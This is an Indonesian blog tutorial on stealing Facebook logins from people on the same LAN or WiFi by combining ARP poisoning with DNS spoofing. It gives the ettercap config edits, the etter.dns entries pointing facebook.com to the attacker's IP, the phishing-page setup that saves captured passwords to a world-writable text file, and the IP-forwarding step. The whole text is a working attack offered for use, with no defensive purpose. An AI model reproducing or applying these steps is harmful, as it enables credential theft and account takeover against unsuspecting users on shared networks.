PISHING DENGAN TEKNIK DNS SPOFFING Oleh: Yudha Akbar Pramana
Kali aku bahas cara untuk sniffing via LAN ataupun Wifi, teknik lama namun masih cukup ampuh untuk mengelabui client-client yang ada satu jaringan dengan kita. tehnik ini membutuhkan apache server, php, ettercap, script pishing. Hm, oiya tutorial ini uda sukses di tes pada Ubuntu 10.4. Ayo langsung saja ke pembahasan dari pada bertele-tele dalam introductionya. hehe.. Tutoria...
Kali aku bahas cara untuk sniffing via LAN ataupun Wifi, teknik lama namun masih cukup ampuh untuk mengelabui client-client yang ada satu jaringan dengan kita. tehnik ini membutuhkan apache server, php, ettercap, script pishing. Hm, oiya tutorial ini uda sukses di tes pada Ubuntu 10.4. Ayo langsung saja ke pembahasan dari pada bertele-tele dalam introductionya. hehe..
Tutorial ini aku ambil dari IndonesianCoder.com hasil treadnya mas yur4kh4, mau kontak?
[email protected] websitenya : http://devirakhjib.co.cc/ , Trimakasih untuk mas Yur4kh4 , ^_^
>> PERSIAPAN yang perlu kita siapkan.. 1. apache server 2. php 3. ettercap 4. script pishing 5. mental yg kuat & sedang tidak dalam keadaan mabuk.akakakaka.,.
aku anggap semua peralatan sudah di install.. cek apache2 yg di install tadi, ketik "localhost" pada web browser mu .. klo ada tulisan "its works" < file index default dari server apache ada di /var/www klo ga percaya cek saja...:D yur4@localhost /var/www $ ls index.html >> CONFIGURE konfigurasi ettercap tempat konfigurasinya ada di /etc/etter.conf yur4@localhost $ sudo gedit /etc/etter.conf maka akan membuka file etter.conf dengan menggunakan gedit.. selanjutnya cari #--------------# Linux #--------------# if you use ipchains: #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" # if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" hilangkan tanda pagarnya..sehingga menjadi sepert ini #--------------# Linux #--------------# if you use ipchains: redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" penghilangan tanda "#" sama dengan pembebasan/meng-aktivkan...script kalo sudah save...& jangan di ingat-ingat lagi...ahahahaa selanjutnya.. rubah file etter.dns yang terdapat di /usr/share/ettercap yur4@localhost $ gedit /usr/share/ettercap/etter.dns delete isi etter.dns defaultnya dan ganti menjadi seperti ini ============================cut here=============================
facebook.com A 10.10.10.6 *.facebook.com A 10.10.10.6 www.facebook.com PTR 10.10.10.6 # Wildcards in PTR are not allowed ============================cut here============================= sedikit penjelasan facebook.com = site yang akan kita pishing 10.10.10.6 = IP attacker NB: untuk melihat ip yur4@localhost $ ifconfig kemudian save... selanjutnya...copy file-file pishing kita ke /var/www biasanya ada 3 file..index.php terserah.txt logs.php sebelumnya di hapus aja dulu index.html defaultnya y... beri perintah gini di file terserah.txt agar bisa di eksekusi.. root@localhost /var/www $ touch terserah.txt root@localhost /var/www $ chmod 777 terserah.txt okeyy... aku anggap sudah di copy ya... >> EKSEKUSI next...buka ettercap mu.. sekedar berbagi pengalaman saja..klo aku lebih suka membuka ettercap menggunakan mode console...:D yur4@localhost $ sudo ettercap -C=mode/ -i=intercafe -C bisa di ganti dengan -G=mode gui -T=mode text.. misal : yur4@localhost $ ettercap -C -i eth0 aku akan melakukan sniffing pada network card LAN (local area network) di sesuaikan sajsaa dengan network card yg activ di leppy or PC mu.. next... pilih tab "sniff" >> unified sniffing >> pilih network card yg aktiv...[enter] selanjutnya pada tab "host" >> scan host.... kemudia berangkat k tab "plugins" >> manage the plugins aktivkan autoadd & dns_spoff selanjutnya pada tab "mitm" >> arp poisoning..[centang/enter] kemudia terakhir ke tab "start" >> start sniffing...:) wew.,rumit deh kayak yah.,.hee...ngga' kok sebenarnya.,.klo dah biasa ga rumit ..:p jangan senang dulu haruzs ada 1 hal lagi di lakukan...:p yaitu meng-forward ip / berpura2 menjadi server lah., Langsung saja...masuk ke terminal ketikan perintah ini.. yur4@localhost $ sudo nano /proc/sys/net/ipv4/ip_forward password : masukan password mu.. ganti angka 0 dengan angka 1 kemudian save....(ctrl+x >>y>>enter) >> PENUTUP sipp..! tinggal tunggu ...:p lakukan dengan teman mu agar bisa langsung melihat hasilnya... tapi kalo ga percaya...
silahkan buka facebook.com trus login.. seperti biasa password akan tersimpan di terserah.txt bisa lihat di http://localhost/terserah.txt
Tentang Penulis Yudha Akbar Pramana